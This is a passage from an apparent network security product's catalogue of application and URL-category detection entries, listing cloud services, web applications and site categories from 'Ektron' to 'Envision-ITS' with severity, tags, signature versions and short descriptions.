Last changed: sgpkg-ips-1570-5242
Description:
Back to top

EISignerName 2490475

About this situation:
Context: EI Signer Name
Severity: 1
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1686-5242
Description:
Back to top

Ektron

About this situation: Application Ektron detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ektron is provides web content management and customer experience management software.
Back to top

Ekualiti

About this situation: Application Ekualiti detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ekualiti is a suite of cloud-based ERP software designed specifically for the needs of higher education institutions of all sizes.Based on open-source Kuali software, and built on the Amazon AWS platform, Ekualiti delivers secure, reliable, scalable, and affordable administrative software designed for higher education.
Back to top

Elastic-Server

About this situation: Application Elastic-Server detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cohesive Networks provides cloud-class security and networking software for enterprises.
Back to top

Elastica

About this situation: Application Elastica detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Elastica is a provider of Data Science Powered Cloud Application Security. Its CloudSOC platform empowers the companies to confidently leverage Cloud and SaaS applications while staying safe, secure and compliant.
Back to top

Elder-Scrolls-Online

About this situation: Application Elder-Scrolls-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Elder Scrolls Online is a massively multiplayer online role-playing
Back to top

Elead

About this situation: Application Elead detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web-based, single login platform strategically manages customer database, marketing, sales process and customer retention. Virtual BDC Automotive CRM and Complete Retail Management offer solution to sell more cars and maximize customer lifetime profitability.
Back to top

eLeaP

About this situation: Application eLeaP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eLeaP offers complete secure, cloud based learning solutions including ecommerce LMS, e-learning courses and LCMS.
Back to top

Electronic-Federal-Tax-Payment-System

About this situation: Application Electronic-Federal-Tax-Payment-System detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Electronic Federal Tax Payment System
Back to top

Element-Payment-Services

About this situation: Application Element-Payment-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Element Payment Services is software company that develops PCI DSS compliant technology designed to secure the processing, transmitting, and storing of payment card related data.
Back to top

Elementool

About this situation: Elementool usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Web based project management, business process management tools, process management tools and project management tools.
Back to top

Elemica

About this situation: Application Elemica detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Elemica is a Supply Chain Operating Network, designed to give total control over global supply chains. Capturing transaction data, across trading partners, and translating it into actionable information is key to driving value out of customers' supply chain.
Back to top

Elephantdrive

About this situation: ElephantDrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is an online backup and remote access service/collaboration tool. It allows users to create simple automated rules to protect data by moving it into an ElephantDrive account. ElephantDrive uses infrastructure-on-demand as part of its architecture, and Amazon Simple Storage service (Amazon S3) in its production infrastructure. Source: Wikipedia
Back to top

Elevated Exposure

About this situation: Sites that camouflage their true nature or that include elements suggesting latent malicious intent.
Context: URL Application Context
Severity: 1
Tags: Extended Protection, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that camouflage their true nature or that include elements suggesting latent malicious intent.
Back to top

Elite-Email

About this situation: Application Elite-Email detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Elite Email is an email marketing solution with manageable mailing list, ability to create an eye-catching professional emails without any technical skills, and tracking the results with detailed real-time analytics.
Back to top

Ellucian

About this situation: Application Ellucian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ellucian delivers a portfolio of technology solutions, developed in collaboration with a global education community, and provide strategic guidance to help education institutions of all kinds navigate change, achieve greater transparency, and drive efficiencies.
Back to top

Elluminate

About this situation: Elluminate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: A a hosted collaborative solution that provides mid sized businesses with collaboration software in a hosted environment.
Back to top

Eloqua

About this situation: Eloqua usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software provides marketing automation and revenue performance management. Source: Wikipedia
Back to top

Elucidat

About this situation: Application Elucidat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mobile learning. Responsive. HTML5. Fast. Your E-learning will work on Phones, Tablets, PCs - any device, anywhere.
Back to top

Email-Center-Pro

About this situation: Application Email-Center-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Email Center Pro is a hosted email management solution that makes it easy to manage shared email accounts and group inboxes
Back to top

Email-Data-Source

About this situation: Application Email-Data-Source detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eDataSource is global provider of independent competitive intelligence for email marketing, social media and ecommerce activity, based on real-time monitoring of 1 million active consumer inboxes and nearly 10,000 brands.
Back to top

Email-It

About this situation: Application Email-It detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Email It is an email marketing software for all businesses sizes.
Back to top

Email-Laundry

About this situation: Application Email-Laundry detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Email Laundry is an vendor of cloud based security services. It helps to manage aspects of customer's email, the email security, email hosting, email signatures and encryption and archiving.
Back to top

Email-Me-Form

About this situation: Application Email-Me-Form detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EmailMeForm's online form builder helps you create beautiful web forms and online surveys. Collect order payments, leads, file uploads, registrations and applications.
Back to top

Email2DB

About this situation: Application Email2DB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Email2DB - Email parser, email to database and email automation solution. Automate business processes from incoming email and tweets.
Back to top

eMaint

About this situation: Application eMaint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eMaint Enterprises provides CMMS (Computerized Maintenance Management Software) solutions as web-based Software as a Service (SaaS) model for more rapid implementation for manufacturers, service providers, fleet operators, energy and utility companies, health care facilities, universities, municipalities, and facility and property managers, among others.
Back to top

eMarketing-Suite

About this situation: Application eMarketing-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Emarsys eMarketing Suite offers an integrated, complete and actionable solution to maximize your customer engagement and revenue.
Back to top

Emaze

About this situation: Emaze usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This service allows users to create, manage, and share their presentations through an online platform built on html5 technology. Source: Wikipedia
Back to top

Embassy-Software

About this situation: Application Embassy-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Embassy Software offers EDI software which includes EDI tools and EDI services for need to send and receive EDI data with trading partners.
Back to top

Embed.ly

About this situation: Application Embed.ly detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Embedly is the new link, replacing URLs with engaging videos, images and media. Through a suite of tools, plugins and APIs, Embedly is the source for embedding content and previewing links on the web.
Back to top

EMC

About this situation: Application EMC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: EMC provides the technologies and tools that help design, build, and manage information infrastructures. These infrastructures help to store, protect, and manage information.
Back to top

EMC-Documentum-Webtop

About this situation: EMC Documentum Webtop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: Browser-based interface that provides access to the EMC Documentum repository and enterprise content management services.
Back to top

Emediate

About this situation: Emediate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description: Emediate is a web advertising and statistic collection service.
Back to top

Emerging Exploits

About this situation: Sites found to be hosting known and potential exploit code.
Context: URL Application Context
Severity: 1
Tags: Extended Protection, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites found to be hosting known and potential exploit code.
Back to top

EMEX

About this situation: Application EMEX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EMEX is a provider of environmental, health and safety software.
Back to top

Emma

About this situation: Application Emma detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Emma provides web-based email marketing service to be a smart marketer. Create, send and track email campaigns and email newsletters - and get results. Every account comes with design, customer support.
Back to top

eMobus

About this situation: Application eMobus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eMOBUS provides a simple and fast way for companies to manage mobile user spend, security and support from a single platform.
Back to top

eMoney-Advisor

About this situation: Application eMoney-Advisor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eMoney Advisor is web-based software for financial advisors
Back to top

Empflix

About this situation: Empflix usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Emplix is an adult video streaming service.
Back to top

Empire-Avenue

About this situation: Empire Avenue usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Showcase your social reputation through your Profile. Reward people for connecting with you and discovering your content through Missions. Play the Social Stocks game to expand your network.
Back to top

Employ-Florida-Marketplace

About this situation: Application Employ-Florida-Marketplace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Employ Florida Marketplace - Complete set of employment tools for job seekers in Florida. Search jobs, create resumes, find education and training. Employers can find candidates, post jobs, search labor market information.
Back to top

Employee-Benefits-Corporation

About this situation: Application Employee-Benefits-Corporation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Employee Benefits Corporation - Flex plans, HRAs, HSAs, and COBRA - administer compliant benefits that meet employer needs.
Back to top

Employer-eservices

About this situation: Application Employer-eservices detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Employer eServices represents suite of online tools designed to save employers time and money.
Back to top

Employers-Choice-Online

About this situation: Application Employers-Choice-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EmployersChoiceOnline.com offers an extensive range of screening searches available today, including employment, tenant, vendor and nanny Screening.
Back to top

EmployWise

About this situation: Application EmployWise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EmployWise - integrated SaaS employee life-cycle management software. Its key modules can handle all aspect of human resource needs from recruitment to retirement.
Back to top

EmpXtrack

About this situation: Application EmpXtrack detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EmpXtrack is a full featured global HR and management software on the cloud. It automate all HR functions for small and large businesses. EmpXtrack covers all areas of Management and helps automate the entire employee lifecycle. It includes HRIS, Payroll, Appraisal, Self Services, Applicant Tracking, Benefits administration, Goal setting
Back to top

Emulex

About this situation: Application Emulex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Emulex provides connectivity, monitoring and management solutions for high-performance networks, delivering provisioning, end-to-end application visibility, optimization and acceleration for the next generation of software-defined, telco and Web-scale data centers.
Back to top

EnableHR

About this situation: Application EnableHR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud-based HR solution to deliver HR and WHS processes, tools, advice and record management using legally backed content
Back to top

Enbrite.ly

About this situation: Enbrite.ly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Enbrite.ly is a advertisement statistics collection and analysis service.
Back to top

Enchanted-Learning

About this situation: Application Enchanted-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enchanted Learning Software creates childrens educational web sites and games designed to stimulate creativity, learning, enjoyment, and imagination.
Back to top

Encoding.com

About this situation: Application Encoding.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Encoding.com is an enterprise cloud video encoding and media processing software.
Back to top

Encrypted-Server-Name-Indicator

About this situation: Encrypted Server Name Indicator usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1237-5242
Description: Encrypted Server Name Indicator (ESNI) is an extension to the TLS 1.3 protocol that prevents intercepting the TLS Server Name Indicator (SNI) extension. The SNI extension can be used to determine which websites users are visiting.
Back to top

Endava

About this situation: Application Endava detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Endava supports the full software lifecycle, covers application development and management, testing, digital media, consulting services, infrastructure management and cloud services.
Back to top

Endicia

About this situation: Application Endicia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Endicia offers online postage and shipping solutions for online sellers, warehouse shippers, and more.
Back to top

EndNote

About this situation: EndNote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1638-5242
Description: EndNote is a software tool that allows users to search, publish and manage bibliographies, citations and references.
Back to top

Endomondo

About this situation: Endomondo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-630-5211
Description: Endomondo is a fitness tracking mobile application combined with a website run by a company with same name. Source: Wikipedia
Back to top

Endpoint-Application-Unknown

About this situation: Unknown Endpoint Application
Context: EI Correlation
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The endpoint application that the connection uses is unknown. There may not be an identification method for this application, or not enough data has been seen in the metadata sent by Endpoint Intelligence.
Back to top

Endpoint-Context-Unavailable

About this situation: Endpoint Context Unavailable
Context: EI Correlation
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: No metadata available for the connection. There may be a problem with the metadata connection from the endpoint to the firewall or the endpoint was unable to read metadata for the connection.
Back to top

Endpoint-Modeling

About this situation: Application Endpoint-Modeling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Endpoint modeling represents a qualitatively different threat detection capability that delivers powerful benefits. With Dynamic Endpoint Modeling, you gain a continuous, unobstructed understanding of every endpoint's behavior, regardless of its function, rapid identification of indicators of compromise without dependencies on log file monitoring, deep packet inspection
Back to top

Endpoint-Operating-System-Unknown

About this situation: Unknown Endpoint Operating System
Context: ECA OS Correlation
Severity: 1
Tags: Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The endpoint operating system that the connection uses is unknown. There may not be an identification method for this operating system, or not enough data has been seen in the metadata sent by Endpoint Context Agent.
Back to top

Enea

About this situation: Application Enea detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enea is a supplier of Linux and real-time operating system solutions, including middleware, tools, databases, and services, with a vision to enable communication.
Back to top

Enfos

About this situation: Application Enfos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enfos is an environmental liability management software that connects people and their data in real time.
Back to top

Engage

About this situation: Application Engage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Government software that streamlines land, permitting, asset, licensing, right-of-way, legislative management, and resource and recreation management processes.
Back to top

Engage2Excel

About this situation: Application Engage2Excel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Engage2Excel helps you measure, manage and improve performance with the industrys only ROI-based employee recognition solution.
Back to top

Engagor

About this situation: Application Engagor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Engagor is a customer engagement and insights platform for social brands and enterprises.
Back to top

Engine-Yard

About this situation: Application Engine-Yard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Engine Yard is a platform providing tools for creating software applications.
Back to top

Engineyard.cloud

About this situation: EngineYard.Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Engine Yard provides tutorials, videos, and podcasts to help developers. For example, there is information on the overall platform architecture, troubleshooting, dealing with databases, and migrating to the platform. Engine Yard offers technical expertise, uptime guarantees, performance and scale.
Back to top

Enjin

About this situation: Application Enjin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enjin provides a content management system designed for gaming communities with an intertwined social gaming layer.
Back to top

enjoyQR

About this situation: Application enjoyQR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: enjoyQR is a service that offers a practical combination of mobile shopping and mobile payment which is installed into the retailer's existing infrastructure. The technology platform enjoyQR offers retailers and payment service providers access to the mobile.
Back to top

Enli

About this situation: Application Enli detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enli Health Intelligence is a population health technology company that enables care teams to perform to their full potential by integrating healthcare data with evidenced-based guidelines embedded in provider workflows across the population and at the point of care.
Back to top

eNom

About this situation: Application eNom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eNom, Inc. is a domain name registrar and Web hosting company that also sells other products closely tied to domain names, such as SSL certificates, e-mail services, and Website building software.
Back to top

Enroll

About this situation: Application Enroll detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enroll is a collaborative learning ecosystem that connects together students, parents, educators, learning support personnel and education focused organizations.
Back to top

Enrollment-Rx

About this situation: Application Enrollment-Rx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enrollment Rx is a higher education technology vendor providing innovative cloud-based CRM solutions that span the entire student lifecycle.
Back to top

Ensighten

About this situation: Ensighten usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1764-5242
Description: Ensighten is a global tag management and customer tracking platform vendor.
Back to top

Enspire-Commerce

About this situation: Application Enspire-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enspire Commerce enables retailers, distributors and logistics providers to deliver customer focused commerce via the retail industry cloud-based enterprise commerce management solution on a platform.
Back to top

Enstratius

About this situation: Application Enstratius detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enstratius provides cloud infrastructure management for public, private, and hybrid cloud operations aligned with enterprise governance and security needs. It provides users with an access-controlled view across corporate cloud resources.
Back to top

Enternships

About this situation: Application Enternships detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enternships work with Startups and SMEs, as well as international companies such as Telef
Back to top

Enterprise-Business-Software

About this situation: Application Enterprise-Business-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Slingshot's ERP software suite provides for: sales order management, procurement control, inventory control and planning, financial management and system integration controls.
Back to top

EnterpriseDB

About this situation: Application EnterpriseDB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: EnterpriseDB is a database platform company for digital business that delivers an open source-based data platform for new applications, cloud re-platforming, application modernization, and legacy migration.
Back to top

Entertainment

About this situation: Sites that provide information about or promote motion pictures, non-news radio and television, books, humor and magazines.
Context: URL Application Context
Severity: 1
Tags: Entertainment, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote motion pictures, non-news radio and television, books, humor and magazines.
Back to top

Entertainment Video

About this situation: Sites that host videos with entertainment-oriented content.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host videos with entertainment-oriented content.
Back to top

Entertainment-Weekly

About this situation: Entertainment Weekly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Entertainment Weekly is an American magazine, published by Time Inc., that covers film, television, music, Broadway theatre, books and popular culture. Source: Wikipedia.
Back to top

Entertane.com

About this situation: ENTERTANE.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Enthusem

About this situation: Enthusem usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Enthusem is a digital marketing solution that specializes in offline to online marketing. It helps Connecting with valuable contacts to grow their business. That means something different for each client. For some, it's sales people that need to get in front of decision makers in order to acquire new business. For others, it could mean recruiting top talent to grow their team.
Back to top

Entree

About this situation: Application Entree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Entree - Online Food Distributor Software
Back to top

entreprise-facile

About this situation: Application entreprise-facile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: It lets to share documents with other employees and accountants
Back to top

Entrust

About this situation: Application Entrust detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Entrust offers security software and services in public key infrastructure, fraud detection, and mobile authentication.
Back to top

Entrust-AIA

About this situation: Entrust AIA service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Authority Information Access is a mechanism which allows the client to verity entire certificate chain, including intermediate certificates.
Back to top

Entrust-CRL

About this situation: Entrust CRL service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-773-5211
Description: Certificate Revocation Lists are used to check validity of individual certificates with HTTPS.
Back to top

Entrust-Online-Certificate-Status-Service

About this situation: Entrust Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-758-5211
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

Entryless

About this situation: Application Entryless detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Entryless enables companies to import any style or type of bill into the cloud accounting systems.
Back to top

Envato

About this situation: Application Envato detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Envato operates a group of digital marketplaces that sell creative assets for web designers, including themes, graphics, video, audio, photography and 3D models.
Back to top

Envestnet

About this situation: Application Envestnet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Envestnet, Inc. - provider of unified wealth management technology and services to investment advisors. Open-architecture platforms unify and simplify the wealth management process, delivering unparalleled flexibility, accuracy, performance and value.
Back to top

Enviance-EHS

About this situation: Application Enviance-EHS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enviance EHS provides data collection, reporting and analysis, all the tools you need for environmental compliance management.
Back to top

Envision-ITS

About this situation: Application Envision-ITS detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Envision ITS is a provider of customer computer service.
Back to top

Epam

